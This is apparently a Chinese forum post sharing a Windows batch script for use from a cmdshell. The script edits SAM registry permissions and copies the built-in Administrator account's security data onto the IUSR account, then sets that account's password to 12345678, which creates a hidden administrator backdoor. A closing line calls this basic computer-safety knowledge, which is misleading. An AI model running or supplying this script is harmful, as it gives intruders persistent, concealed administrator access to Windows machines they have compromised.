[摘要]其实就是注册表里复制管理员权限到普通用户那个操作,不过毕竟批处理容易在cmdshell里实现, 贴出来吧 echo off setlocal enabledelayedexpansion ec... 其实就是注册表里复制管理员权限到普通用户那个操作,不过毕竟批处理容易在cmdshell里实现, 贴出来吧 echo off setlocal enabledelayedexpansion echo %computername% echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg" regini "%windir%\..\1.reg" regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername% rem unicode ->ascii type "%windir%\..\1.reg" >"%windir%\..\2.reg" del /q "%windir%\..\1.reg" rem find IUSR_%computername% 的对应id for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b del /q "%windir%\..\2.reg" rem export administrator register regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 type "%windir%\..\1.reg" >"%windir%\..\2.reg" del /q "%windir%\..\1.reg" rem replace 1fx->iusr_id for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do ( for /f "tokens=*" %%j in ("%%i") do ( set TMP=%%j set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!" echo !TMP!>>%windir%\..\1.reg ) ) regedit /s %windir%\..\1.reg del /q %windir%\..\1.reg del /q %windir%\..\2.reg echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg" regini "%windir%\..\1.reg" del /q "%windir%\..\1.reg" net user IUSR_%computername% 12345678 克隆出来的用户名是固定的,随便变换的话要改代码
上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。
|